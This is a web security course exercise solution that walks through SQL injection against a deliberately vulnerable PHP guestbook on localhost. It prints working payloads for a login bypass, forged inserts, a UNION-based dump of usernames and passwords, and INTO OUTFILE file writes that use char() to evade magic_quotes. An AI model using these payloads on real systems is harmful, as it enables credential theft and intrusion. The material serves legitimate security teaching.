Web Security

Solution: Injection Flows

Study the script

Using the search functionality of your guestbook (version 2, downloaded last week), try to execute some other functionalities.

Update your configuration of PHP (file php.ini) in order to disable the magic_quote_gpc option.
I edited the file php.ini in the directory /opt/lampp/etc/.

; Magic quotes for incoming GET/POST/Cookie data.
; This security feature has been turned off by E.Benoist 
; (for web security course)
; 2nd of june 2008
; magic_quotes_gpc = On
magic_quotes_gpc = Off

Use the select field to make a SQL Error
Error messages are disabled (for security reasons) so you can not see anything.
Change the selection to add a "or 1" that makes the selection always true.
You can type
```
hello' OR 'a'='a'#
```
You have to take care to have a string at the end, since there is still a ' comming in the php, your expression will receive a quote.
Insert a new record in the guestbook database, and give another userid as author.
Here you have to log in the system
Type the following input in the message field:
```
Message to be inserted','2','0')#
```
since the file contains the following command:
```
$query = "INSERT INTO `guestbook` (`guestbookID` , `title` , 
          `content`,`author` ) 
          VALUES ( NULL , '$title', '$text','$user','dest');";
$result = mysql_query($query , $conn);
```
We insert the new content and comment out the rest of the sentence (about the user).
Hack the list functionality, such that you can see all the users Here we need some tricky tricks. To make out tests, we have created a small form attack-forms.php (source attack-forms.php). We use the SQL statement UNION ALL that allows to concatenate the results of two select.
```
hello%' union all select userID,password,username,4,5,6,7,8 from user#
```
Since the second request has exactly the same number of columns as the first, they are simply concatenate at the end.
Hack the login, such that you can log as any user (giving only the userid).
Since the select is based on a WHERE clause, we just need to fool the clause.
We give the following expression as username (and nothing as password)
```
' or userID=1 #
```

Those attacks where easy because we have already disabled the magic_quote option. The following attacks work also if the option is on.

More realistic attacks

To be more realistic, we have to reactivate the magic_quote_gpc option. Turn it to ON.
```
magic_quotes_gpc = On
```
Create a page containing a textarea that accesses the page with the view message mode. (a form with id) We use here the same file as in the previous exercise: attack-forms.php (source attack-forms.php).

Use this form to create a file containing all the messages.
We use here the SELECT .. INTOU OUTFILE syntax. Unfortunately this syntax requires the name of a file. That should be written as a string:

2 or 1=1 AND guestbookID=author INTO OUTFILE '/tmp/test.txt'#

Would be sufficient without magic_quotes. But since we have activated this security feature, it does not work. We have to suppress the quotes.
We need a string that is given without quotes. We can use the char() function of MySQL.
So we need to know the char() expression corresponding to '/tmp/test.txt'. For this, we use the ascii() function of SQL.

mysql> select ascii('/');
+------------+
| ascii('/') |
+------------+
|         47 |
+------------+
1 row in set (0,00 sec)

mysql> select ascii('t');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    17
Current database: *** NONE ***

+------------+
| ascii('t') |
+------------+
|        116 |
+------------+
1 row in set (0,00 sec)

mysql> select ascii('m');
+------------+
| ascii('m') |
+------------+
|        109 |
+------------+
1 row in set (0,00 sec)

mysql> select ascii('p');
+------------+
| ascii('p') |
+------------+
|        112 |
+------------+
1 row in set (0,00 sec)

mysql>

So the ascii characters corresponding to /tmp are 47,116,109,112. If we continue, the list corresponding to /tmp/test.txt is 47,116,109,112,47,116,101,115,116,46,116,120,116. We can verify the sentence in MySQL

mysql> select char(47,116,109,112,47,116,101,115,116,46,116,120,116);
+--------------------------------------------------------+
| char(47,116,109,112,47,116,101,115,116,46,116,120,116) |
+--------------------------------------------------------+
| /tmp/test.txt                                          |
+--------------------------------------------------------+
1 row in set (0,00 sec)

Should work, but still does not.

2 or 1=1 AND guestbookID=author INTO OUTFILE char(47,116,109,112,47,116,101,115,116,46,116,120,116)#

The following URL creates a file:

http://localhost/WebSecurity/examples/guestbook/index.php?id=2%20or%201=1%20into%20outfile%20%27/tmp/ccc%27%20--

Unfortunately, the following URL works also:

http://localhost/WebSecurity/examples/guestbook/index.php?id=2%20or%201=1%20into%20outfile%20%27/Applications/XAMPP/htdocs/ccc%27%20--

the file is accessible from the internet: http://localhost/ccc